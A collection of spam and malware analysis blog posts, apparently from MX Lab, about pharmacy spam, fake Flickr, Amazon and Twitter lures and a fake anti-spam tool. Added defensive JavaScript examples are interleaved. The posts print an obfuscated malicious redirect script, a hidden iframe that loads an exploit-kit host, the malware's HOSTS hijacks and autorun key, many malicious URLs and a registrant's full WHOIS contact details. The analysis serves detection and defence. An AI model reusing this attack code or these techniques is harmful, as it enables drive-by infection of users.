Spam message inside a ZIP file

Spammers often use new techniques to deliver their messages to recipients without being caught by email security solutions. Today, one such spam email caught our attention because of the original technique that was used.

The spam email had the subject “Your wife photos attached”, a very short body, “Your wife photos”, and the attached file rooster.zip.

At first, we thought this was some new email security threat, so we investigated the ZIP archive. Once extracted, the file rooster.jpg was available. The filename does not end in .exe, nor in the old trick of many spaces followed by .exe, so we opened the JPEG and found this spam advertisement for Viagra, Cialis and VPXL.

The instructions, if you are interested, are to go to med242.ru, which leads to the web site of the Canadian Pharmacy.

I can understand that spammers try different techniques, but this one is, in my humble opinion, not a very good one. What a hassle to read the message.

Yahoo Groups being abused by spammers

Well-known names are quite often the subject of abuse, and this time Yahoo Groups is being used in spam messages. Spammers have created a large number of accounts on Yahoo Groups and are including the group URLs in their spam messages.

The messages come with a subject line of the form ****@***.be VIAGRA ® Official Site -77%. The body of the email contains only a URL such as hxxp://groups.yahoo.com/group/*****/message.

This is an example of such a web site.

The image that promotes Viagra also contains a URL that leads to, in our case, hxxp://superdrugsudden.com:8080/. And yes, it’s the Canadian Pharmacy again. We have to admit that they are very active on the internet.

Flickr welcome message leads to Canadian Pharmacy web site

Various brands have been the subject of spam campaigns, and today Flickr, the photo sharing web site, is also being abused by spammers.

MX Lab started to intercept messages with the subject “[Flickr] Welcome!”, sent from a spoofed email address and containing a welcome message from Flickr (see image below).

Every link in the message leads to a different URL, even the links behind the Terms of Service and the Privacy Policy.

hxxp://mahimatex.com/sanitation.html
hxxp://electricbrochures.com/custodian.html
hxxp://eventosgs.com.ar/climate.html
hxxp://newcivas.altervista.org/overstatements.html
hxxp://complicat.go.ro/modestly.html
hxxp://kankash-g-s.com/chicagoans.html
hxxp://pliki.open-it.pl/deigned.html
hxxp://turismatica.go.ro/grapefruit.html
hxxp://behsood.ir/schedulable.html
hxxp://jpaquino.com/headlines.html
hxxp://awtchiro.com/consulates.html

The web sites above function as a redirect to hxxp://keptoften.com/.

Each message includes different URLs, so these spammers are using a massive number of domains in this campaign.

I personally do not understand why they are doing this, because an Intent Analysis filter, which analyses the URLs included in emails, can blacklist many of these URLs immediately when investigating one single spam message.
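To show what such an intent analysis step looks like in practice, here is an added example (written for this post, not MX Lab's or any vendor's filter code). It pulls every URL out of a message body, normalises the hostname and checks it against a small domain blocklist; the message body and the blocklist are constructed for the example, and the defanged “hxxp” scheme used on this page is accepted next to the real one.

```javascript
// Added example: a minimal "intent analysis" pass over an e-mail body.
// Sample data below is constructed; "hxxp" is the defanged scheme used on the page.

// Constructed sample: a body in the style of the fake Flickr welcome mail.
const SAMPLE_BODY = [
  'Welcome to Flickr!',
  'Confirm your account: hxxp://mahimatex.com/sanitation.html',
  'Terms of Service: hxxp://electricbrochures.com/custodian.html',
  'Privacy Policy: http://eventosgs.com.ar/climate.html',
  'Help: https://www.example.org/help?ref=1', // legitimate link, for contrast
].join('\n');

// Blocklist seeded from a previously analysed message (constructed here).
// Entries are compared against the lower-cased hostname without port.
const BLOCKLIST = new Set(['mahimatex.com', 'eventosgs.com.ar', 'keptoften.com']);

// Extract URLs; accept the defanged "hxxp(s)" scheme as well as the real one.
function extractUrls(text) {
  const re = /\bh(?:tt|xx)ps?:\/\/[^\s<>"')]+/gi;
  return text.match(re) || [];
}

// Hostname of a URL, lower-cased and without the port. The defanged scheme
// is rewritten so the built-in URL parser accepts it; unparsable input -> null.
function hostOf(url) {
  const fixed = url.replace(/^hxxp/i, 'http');
  try {
    return new URL(fixed).hostname.toLowerCase();
  } catch (e) {
    return null;
  }
}

// Classify every URL in a message body: which hosts hit the blocklist, and
// which hosts are new candidates to review. One sample message yields all
// of its domains at once, which is the point made in the post.
function analyseMessage(body, blocklist) {
  const urls = extractUrls(body);
  const hits = [];
  const unknown = [];
  for (const u of urls) {
    const h = hostOf(u);
    if (h === null) continue;
    if (blocklist.has(h)) hits.push(h);
    else if (!unknown.includes(h)) unknown.push(h);
  }
  return { urls, hits, unknown, block: hits.length > 0 };
}
```

A real filter would also strip tracking parameters, resolve redirects and consult a shared list such as SURBL, but the shape is the same: one message, every embedded domain extracted and scored.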

When visiting the sites using only the domain, we quite often get a warning from our browser that the site is known to host malware. In other cases, or when ignoring the warning, we are redirected to hxxp://bestadultsite.ru/run/go.php?sid=3 and afterwards to the web site of Canadian Neighbor Pharmacy, hxxp://pharmacymentalhealth.com (see image below).

Thumbs up for Bit.ly for blocking a shortened URL in “Coupe du Monde de la FIFA 2010” spam

Emails regarding the FIFA World Cup are going around the world now, and people with less good intentions are on the lookout to create some mayhem. A recent example is the email “FIFA World Cup South Africa… bad news”, but the traditional spam messages are also going around on the internet.

MX Lab intercepted some emails with the subject “Coupe du Monde de la FIFA 2010” from World Cup <207peugeot@menara.ma> that are obviously spam. Here is the body of the email:

bonjour ,

est ce que vous voulez voir les matchs de la coupe gratuitement ?
si oui n’hesiter pas a telecharger ce logiciel :

http://bit.ly/worldcupe

cordialement

=========================================

The message is in French, but translated it offers you software to watch the World Cup soccer matches for free.

When following the bit.ly shortened link, we arrive at the FLV web site http://www.flvpro.com/movies/?aff=4749_movies.

While a free download of such a tool may be all very nice, getting your message out to the world in this format is not the way to do it. I refer to the use of bit.ly for the URL, the absence of unsubscribe options and the lack of any clear indication of who sent this message. Very bad marketing, if you ask me.

MX Lab reported this to bit.ly, which is something we usually do not do but we thought why not, and bit.ly responded within 10 minutes with a reply that the shortened URL had been blocked from further use. Thumbs up for such a fast response.

Now, this is completely off topic, but notice the counter ‘Downloaded 2358755 times’ on the web site http://www.flvpro.com/. This is just a JavaScript timer that increments the counter in the browser:

<script type="text/javascript">
var num = 2358754;
function IncCounter() {
    num = num + 1;   // increment counter by 1
    document.getElementById("cntr").innerHTML = num.toLocaleString();
    t = setTimeout('IncCounter()', 2000);   // runs again every 2 seconds; change 2000 to 60000 to update once per minute
}
</script>

When you refresh the page, the counter is back to 2358755.
Very nice marketing! ;-)

“FIFA World Cup South Africa… bad news” emails lead readers to a host with malware

MX Lab intercepted a few samples of emails with the subject “FIFA World Cup South Africa… bad news”.

The From address is spoofed, and this is the body of the email:

Hello!!

FIFA World Cup 2010 scandal news, read attached document

Attached is the file news.html or open.html, which contains malicious JavaScript:

<script type='text/javascript'>
function dX(){};
var h=new Date();
dX.prototype = {
f : function() {
var u=function(){};
var uY=new Date();
var o="";
var k=document;
var oE=function(){};
var l='';
this.i=33457;
var kV=k['l.oSc<a(t<i_oSnS'.replace(/[S_\<\(\.]/g, '')];
var w=function(){};
var p=false;
this.pP=false;
this.s='';
kV['hGrGe>f>'.replace(/[\>mYGw]/g, '')]='hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ'.replace(/[JS2\>l]/g, '');
var iK="iK";
pK='';
this.d="d";
uM="";
}
};
this.dK="";
var fG=new dX();
var dR="dR";
fG.f();
hJ=false;
</script>

Once the padding characters are stripped out by the replace() calls, the script simply assigns hxxp://advancedwoodtech.com/xnu4ej/z.htm to document.location.href, redirecting your browser to that page.
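The obfuscation above is nothing more than junk characters padded into each string plus a regex that strips exactly those characters again. The following added example (ours, not part of the MX Lab post or the malware) recovers the hidden strings statically, without ever running the sample: the three padded literals and their character classes are copied from the script, while the helper functions are an assumption of this example.

```javascript
// Added example: decode the "padded literal + replace(/[junk]/g, '')" trick
// used by the sample above, without executing any of it.

// Reproduce one cleanup: remove every listed junk character from the literal.
function stripJunk(padded, junkChars) {
  // Escape the characters that are special inside a regex character class.
  const escaped = junkChars.map(c => c.replace(/[\\\]\[^-]/g, '\\$&')).join('');
  return padded.replace(new RegExp('[' + escaped + ']', 'g'), '');
}

// The three literals from the sample with the characters their regexes remove.
const SAMPLE_LITERALS = [
  { padded: 'l.oSc<a(t<i_oSnS', junk: ['S', '_', '<', '(', '.'] },
  { padded: 'hGrGe>f>',         junk: ['>', 'm', 'Y', 'G', 'w'] },
  { padded: 'hJt>t>p>:S/2/2aSd>v2aSnlcleldSwloloJd>tSe2c2hJ.2cSo>ml/2xJnSuJ4JeSjS/2z2.ShltlmJ',
    junk: ['J', 'S', '2', '>', 'l'] },
];

// Decode every literal; read together they give document[<prop>][<prop>] = <url>.
function decodeSample(literals) {
  return literals.map(({ padded, junk }) => stripJunk(padded, junk));
}

// Static scanner: find each  '...'.replace(/[...]/g, '')  call in a script body
// and replace it in place by the decoded string, so an analyst sees the real
// property names and the redirect target directly in the source.
function decodeReplaceCalls(script) {
  const re = /'([^']*)'\.replace\(\/\[([^\]]*)\]\/g,\s*''\)/g;
  return script.replace(re, (match, padded, cls) => {
    // Turn the character class back into a plain list, undoing "\<" style escapes.
    const junk = [];
    for (let i = 0; i < cls.length; i++) {
      if (cls[i] === '\\' && i + 1 < cls.length) junk.push(cls[++i]);
      else junk.push(cls[i]);
    }
    return "'" + stripJunk(padded, junk) + "'";
  });
}
```

Running decodeSample on the three literals yields “location”, “href” and the URL named in the post, which is how the redirect target can be confirmed from the attachment alone.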

At the moment the page mentioned here is not active (we got a 404 error when visiting), so we can’t investigate this further. But we are pretty sure it would download malware in an attempt to infect your computer, and then redirect you to a Canadian Pharmacy spam web site.

This email has all the characteristics of previous campaigns where social media is used to lure visitors to a web site and get their computers infected.

Our recommendation is: when you receive this type of email, do not open the attached HTML file and delete the email.

[UPDATE]

MX Lab intercepted a new version of this social engineering attack, and the email now contains the file open.html.

This leads to the web site hxxp://shoppingbazzar.co.uk/z.htm. The online document z.htm contains the following code:

<meta http-equiv="refresh" content="3;url=hxxp://toldspeak.com/" />

<iframe src='hxxp://hugefrogs.ru:8080/index.php?pid=10' width='1'
height='1' style='visibility: hidden;'></iframe>

The meta refresh redirects your browser after 3 seconds to hxxp://toldspeak.com, which hosts the Canadian Pharmacy web site mentioned earlier.

Meanwhile the hidden 1x1 iframe loads hxxp://hugefrogs.ru:8080/index.php?pid=10, which contains more obfuscated JavaScript that creates iframes pointing to a PDF file and to a Java .jar file. One of these files is used to attack the computer.
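Both tricks in z.htm, the timed meta refresh to another host and the invisible 1x1 iframe, can be spotted without rendering the page. The following added example (ours, not code from the MX Lab post) is a small static check over the markup; the sample HTML is constructed from the snippet above with the live hosts replaced by placeholder names, and a normal-sized iframe is included to show it is not flagged.

```javascript
// Added example: flag meta-refresh redirects and hidden iframes in raw HTML.
// SAMPLE_HTML is constructed; the ".example" hosts are placeholders.

const SAMPLE_HTML = `
<html><body>
<meta http-equiv="refresh" content="3;url=hxxp://landing.example/" />
<p>Loading...</p>
<iframe src='hxxp://exploit-kit.example:8080/index.php?pid=10' width='1'
height='1' style='visibility: hidden;'></iframe>
<iframe src="/videos/embed" width="640" height="360"></iframe>
</body></html>`;

// Collect the attributes of one tag into an object with lower-cased names.
function parseAttrs(tag) {
  const attrs = {};
  const re = /([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
  let m;
  while ((m = re.exec(tag)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : (m[3] !== undefined ? m[3] : m[4]);
  }
  return attrs;
}

// <meta http-equiv="refresh"> whose target is an absolute URL: delay and URL.
function findMetaRefresh(html) {
  const out = [];
  for (const tag of html.match(/<meta\b[^>]*>/gi) || []) {
    const a = parseAttrs(tag);
    if ((a['http-equiv'] || '').toLowerCase() !== 'refresh') continue;
    const m = /^\s*(\d+)\s*;\s*url\s*=\s*(\S+)/i.exec(a.content || '');
    if (m && /^h(tt|xx)ps?:\/\//i.test(m[2])) out.push({ delay: Number(m[1]), url: m[2] });
  }
  return out;
}

// Iframes that are effectively invisible: 1x1 or smaller, or hidden by style.
function findHiddenIframes(html) {
  const out = [];
  for (const tag of html.match(/<iframe\b[^>]*>/gi) || []) {
    const a = parseAttrs(tag);
    const w = parseInt(a.width, 10);
    const h = parseInt(a.height, 10);
    const tiny = (!isNaN(w) && w <= 1) || (!isNaN(h) && h <= 1);
    const hidden = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(a.style || '');
    if (tiny || hidden) out.push(a.src || '');
  }
  return out;
}

// Combined verdict for a fetched page body.
function scanHtml(html) {
  const refresh = findMetaRefresh(html);
  const iframes = findHiddenIframes(html);
  return { refresh, iframes, suspicious: refresh.length > 0 || iframes.length > 0 };
}
```

A regex-based scan like this is deliberately crude (it ignores iframes injected later by script), but it is enough to triage pages reached from URLs in intercepted spam before anyone opens them in a browser.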

Explorer SPAM Detector for Public is malware

MX Lab intercepted a few messages with the subject “Systematic Security Software : Explorer SPAM Detector for Public”, sent from the spoofed address Systematic Inc <soft@systematic.com>.

The email offers a software tool called Explorer Spam Detector from Symantec:

Systematic launched a new program SPAM detector Explorer, the program automatically detects if a page is original or not, if you open a mail if the sender is not original is detected. If you are tired of spammers and you are tired as your accounts will be broken, to lose money on paypal or lose auctions, Download this program and all your data, all your accounts will be safe. This program is free, you do not need to buy it, you do not need a license.

Below is an actual screenshot of the email:

The included URLs will take you to a web site where the malware is hosted: hxxp://systematic.armed.us/download/Setup.exe.

The malware is approx. 1.5 MB when downloaded and is named Setup.exe.

Submitting the file to VirusTotal shows that only 1 of the 40 AV engines detected the malware: the Symantec AV engine, version 20091.2.0.41. The detection name Suspicious.Insight comes from Symantec’s reputation-based security technology, so it is not the name of the malware.

When executed on a computer, the system gets infected and a new window is created:

The appearance of this window might give you the impression that the software simply did not install correctly. By then, your computer is already infected.

The following file is created:

%AppData%\Microsoft\System\Services\[filename of the sample #1], where %AppData% is a variable that refers to the file system directory that serves as a common repository for application-specific data. A typical path is C:\Documents and Settings\[UserName]\Application Data.

The file %System%\drivers\etc\hosts is modified and the following folders are created:

* %AppData%\Microsoft\System
* %AppData%\Microsoft\System\Services

A Windows registry entry is added so that the malware runs each time the computer boots:

# [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
* [filename of the sample #1] = "%AppData%\Microsoft\System\Services\[filename of the sample #1]"

The HOSTS file is updated with the following hostname-to-IP mappings:

127.0.0.1 www.virscan.org
127.0.0.1 virscan.org
127.0.0.1 221.207.255.61
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 74.53.201.162
127.0.0.1 scanner.novirusthanks.org
127.0.0.1 91.121.223.25
127.0.0.1 www.xxbots.net
127.0.0.1 xxbots.net
127.0.0.1 208.43.26.70
127.0.0.1 www.virusscan.jotti.org
127.0.0.1 virusscan.jotti.org
127.0.0.1 66.36.241.92
127.0.0.1 forums.malwarebytes.org
127.0.0.1 74.63.217.106
127.0.0.1 www.codespace.net
127.0.0.1 codespace.net
127.0.0.1 174.133.4.108

As you can see, after this change you will no longer have access to the web sites listed here. Due to the HOSTS file change, all requests for these sites will point back to your local computer on 127.0.0.1. This prevents the user from visiting these sites for information or for downloading anti-virus/anti-malware software. If you are infected with this malware, make sure that you also clean up the HOSTS file.
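Checking for this kind of HOSTS file tampering is easy to automate. The following added example (ours, not part of the MX Lab post) parses a HOSTS file, reports every entry that pins a security vendor domain, or a bare IP address, to the loopback address, and produces the cleaned file. The HOSTS contents are an inline sample constructed from the mappings above plus the normal default lines; the list of watched domains is an assumption of the example and would be extended in practice.

```javascript
// Added example: detect and remove loopback hijacks of security sites in a
// Windows HOSTS file. SAMPLE_HOSTS is constructed; WATCHED_DOMAINS is ours.

// Domains a user would need in order to get help (constructed from the post).
const WATCHED_DOMAINS = [
  'virustotal.com', 'virscan.org', 'novirusthanks.org', 'jotti.org', 'malwarebytes.org',
];

// Constructed sample HOSTS file: default entries plus the malware's additions.
const SAMPLE_HOSTS = `# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
127.0.0.1       localhost
::1             localhost
127.0.0.1 www.virscan.org
127.0.0.1 virscan.org
127.0.0.1 www.virustotal.com
127.0.0.1 virustotal.com
127.0.0.1 74.53.201.162
127.0.0.1 forums.malwarebytes.org
`;

// Parse HOSTS lines into {ip, host} pairs, skipping comments and blank lines.
function parseHosts(text) {
  const entries = [];
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.replace(/#.*$/, '').trim();
    if (!line) continue;
    const parts = line.split(/\s+/);
    for (const host of parts.slice(1)) entries.push({ ip: parts[0], host: host.toLowerCase() });
  }
  return entries;
}

function isLoopback(ip) {
  return ip === '::1' || /^127\./.test(ip);
}

// True when host equals a watched domain or is a subdomain of one.
function matchesWatched(host, watched) {
  return watched.some(d => host === d || host.endsWith('.' + d));
}

// Entries that map a watched domain, or a bare IP address used as a "name",
// to loopback. The default "localhost" lines are legitimate and ignored.
function findHijacks(text, watched) {
  const suspicious = [];
  for (const e of parseHosts(text)) {
    if (!isLoopback(e.ip) || e.host === 'localhost') continue;
    const ipLiteral = /^\d{1,3}(\.\d{1,3}){3}$/.test(e.host);
    if (ipLiteral || matchesWatched(e.host, watched)) suspicious.push(e.host);
  }
  return suspicious;
}

// The file contents an administrator would keep after removing the hijacks.
function cleanHosts(text, watched) {
  const hijacked = new Set(findHijacks(text, watched));
  return text.split(/\r?\n/).filter(raw => {
    const parts = raw.replace(/#.*$/, '').trim().split(/\s+/);
    const hosts = parts.slice(1).map(h => h.toLowerCase());
    return !(parts.length > 1 && isLoopback(parts[0]) && hosts.some(h => hijacked.has(h)));
  }).join('\n');
}
```

On a real system the same check would read %SystemRoot%\System32\drivers\etc\hosts; any loopback entry for a name the user did not add deliberately deserves a look, not only the vendors listed here.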

The possible country of origin for this malware is Russia.

VirusTotal permalink and MD5: 97ff431ca077c59d76d147832260b7ef.

Web site creator hosts are being abused in spam campaigns

Spammers are not afraid to abuse community sites or blog creators like blogspot.com in their spam campaigns. In some cases the content is published on these sites, in others a redirect is embedded that forwards the visitor to the web site of their choice, offering porn, pills and other stuff.

MX Lab noticed an increase over the last few days of URLs in spam messages that point to (free) web site creator hosts or less well known blog creators. Some of the latest victims are doodlekit.com, sitekreator.com, webs.com, webstarts.com and blogdrive.com.

Some examples of the spam:

of necromancer beyond power drill ostensibly wily
dissidents customer
PornstarMikaTanAnalFingering hxxp://trhombic.blogdrive.com
because girls

dissidents blotched greedily

mirror about starlet likeable
WorldOfLustyAmatteurGalsFujckkingOnCameraWithBigCodfckedLadsAndBelovedSelxToys hxxp://sitekreator.com/Dewtty/sdfgty.html

haunchestoward

for cleavage inside carelessly womanly
bubble baths scythe
AsianSuckingAndFuckingHardcore hxxp://wilfredorz.webs.com
or tea parties

over and accidentally

tea parties flabby
WorldOfLustyAmatenurGalsFujckkingOnCameraWithBigCobckedLadsAndBelovedSjexToys hxxp://s2.webstarts.com/ssey/q2.html

philosopherssecretly

What we also notice is the use of random words in the spam message again. This is a very common technique that has been used in the past to avoid detection by Bayesian filters and/or to pollute the Bayesian filter’s knowledge database when the message is used to train the filter.

This technique is also present in the latest spam campaign of the Canadian Pharmacy:

This is a link to our shop http://bc.greatsilent.ru/

gazoive dyojefip eicyla uxamo kajoubemi zitykiboto yejy
irewyumuco izaafoe samin uypoi nyqii asydado
hoxyaogeqa eokinap asiwy yziuboaxoj alomem kawuqyxy
ajitikumoa fiaxe oqoce qiahow yvenouwa bosyebuje ucotaley
yeqa uhybyo nidodyziru logu noboma uuju uedywaby
…. (cut)….

New web site creator hosts are being used each day. When I visited a few of those web site creator hosts, I found out that signing up is very easy. Account requests can be automated quite easily, up to a certain point, without being blocked by any security measure or by having to click an activation link in an email.

On doodlekit.com we found a CAPTCHA on the subscription web form, but I believe that a good CAPTCHA should have letters that are less readable than this one. Still, it is a start.

On webs.com I set up a dummy web site account with the site address http://tryviagra.webs.com without encountering any security measure at all! This means that anyone can set up a free web site creator account simply by completing the web forms.

In this particular case, I could even automate every step and let a bot do all the work. I could create 10 to 100 accounts a day and perhaps the site administrators wouldn’t even notice. It is a very efficient way of getting coverage on the internet, getting free hosting for a site or redirecting visitors to a site.

To make it worse, such a site could also host malware and try to infect each visitor with malware, ransomware or other malicious files.

As a spammer, I would have the advantage over Intent Analysis tools or SURBL, tools that examine and block messages based on the included URLs, by generating multiple URLs each day and changing the URLs in the spam message.

Again, it shows that internet security is a responsibility of everyone, and everyone should get involved. If we want to stop spammers, we also have to make sure that some of the features spammers have today (this is a nice example, I think) can’t be used tomorrow.

Feel free to comment on this post.

Disclaimer: it is not our intention to attack webs.com over its lack of security (perhaps in a certain way it is), but to point out how easy it is to abuse certain online tools.

Spam campaign from Canadian Pharmacy also contains web based threats

MX Lab detected several web based threats in a spam campaign from Canadian Pharmacy disguised as an Amazon order confirmation.

The campaign comes from the spoofed email address Customer Support <***.***@service.amazon.com> and may have the following subjects (the *** numbers vary):

Confirm #***
Confirmation Order #***
Notice #***
Notify #***
Notification #***
Order Confirmation #***
Order Notice #***
Order Notify #***
Order Notification #***

The body of the email:

Your Order S\n:10444064511 Accepted.
Details hxxp://www.klaudiusz.ramtel.pl/afrikaners.html

Thank you.
Amazon.com Customer Support

The campaign was detected yesterday, but today we found a few threats when following the included URLs. One threat was named HTML:iFrame-LZ[Trj] (Avast).

HTML:iFrame-LZ[Trj] is a malicious HTML script that may be downloaded unknowingly by a user when visiting malicious web sites. The script connects to other sites to download file(s). As a result, the malicious routines of the downloaded files are executed on the affected system.

Twitter accounts abused by spammers

MX Lab detected a spam campaign where Twitter is being abused by spammers to promote online drug stores.

The campaign is sent from random spoofed email addresses and has subjects similar to:

7U1 An amazing selection of brand name medications, all for incredibly low prices!
2F9 Looking for Hytrin? 7N8
6W3 Looking for Abilify?
5Z2 Looking for Fosamax?
4G5 Do you suffer from male impotence? Order Viagra online today 8I7
5Y5 Do you have a urinary blockage?

Some samples of the body:

hxxp://twitter.com/oscaresquire/status/5804523982

All Medications are Always 100% Safe Legal
Our store is Verified, Trusted Licensed
Guaranteed LowPrices – up to 85% Off

! G6Y3

* P h 3nt_ er mI.ne 37.5
* S0 .m@
* X@ /\/ a .X
* R1 .T@ L in
* C 0 d1n3
* V /\ L 1Um
* KL 0 N_0.p in
* AMB1en
* Ci..@ _Lis
* V| @ g.R @

www.twitter.com/dweepadvani/status/5790731913
This message was sent to 96190

And another one

site that pharmacies and big companies don’t want you to know about!
Vicodin ES Online, Hyrdrocodone, Lortab…

hxxp://twitter.com/itaiba/status/5803131461

They all have in common a URL that points to a Twitter status. The format is http://twitter.com/***/status/***, where *** stands for random characters.

Some examples of such a Twitter account that directs you to the online pharmacy:

The med4udirect.com shop looks like this:

The domain appears to be registered in China.

DomainName : MEDS4UDIRECT.COM

RSP: China Springboard Inc.
URL: http://www.namerich.cn

Name Server :NS3.BERTOSNS.COM
Name Server :NS5.LOVELYSNB34.COM
Name Server :NS1.HDNSSTUFF.COM
Name Server :NS6.LOVELYSNB34.COM
Name Server :NS2.HDNSSTUFF.COM
Name Server :NS4.BERTOSNS.COM
Status :clientTransferProhibited
Status :clientDeleteProhibited
Creation  Date :2009-09-26
Expiration Date :2010-09-26
Last Update  Date :2009-11-11

Registrant ID :V-X-63521-21717
Registrant Name :LU TAO
Registrant Organization :LU TAO
Registrant Address :JIEFANGLU251
Registrant City :ShangHai
Registrant Province/State :ShangHai
Registrant Country Code :CN
Registrant Postal Code :200126
Registrant Phone Number :+86.0217415426
Registrant Fax :+86.0217415426
Registrant Email :djsnhe@163.com

Administrative ID :V-X-63521-21717
Administrative Name :LU TAO
Administrative Organization :LU TAO
Administrative Address :JIEFANGLU251
Administrative City :ShangHai
Administrative Province/State :ShangHai
Administrative Country Code :CN
Administrative Postal Code :200126
Administrative Phone Number :+86.0217415426
Administrative Fax :+86.0217415426
Administrative Email :djsnhe@163.com

Billing ID :V-X-63521-21717
Billing Name :LU TAO
Billing Organization :LU TAO
Billing Address :JIEFANGLU251
Billing City :ShangHai
Billing Province/State :ShangHai
Billing Country Code :CN
Billing Postal Code :200126
Billing Phone Number :+86.0217415426
Billing Fax :+86.0217415426
Billing Email :djsnhe@163.com

Technical ID :V-X-63521-21717
Technical Name :LU TAO
Technical Organization :LU TAO
Technical Address :JIEFANGLU251
Technical City :ShangHai
Technical Province/State :ShangHai
Technical Country Code :CN
Technical Postal Code :200126
Technical Phone Number :+86.0217415426
Technical Fax :+86.0217415426
Technical Email :djsnhe@163.com

Can a spammer be creative?

Yes, that is the answer we have today. MX Lab detected a nice piece of spam and we didn’t want to hold this one back from you.

It’s not image based, and not ASCII art either, but the text is constructed and formatted with the character “#”. It didn’t render well in Entourage on Mac, so it needs a little work. ;-)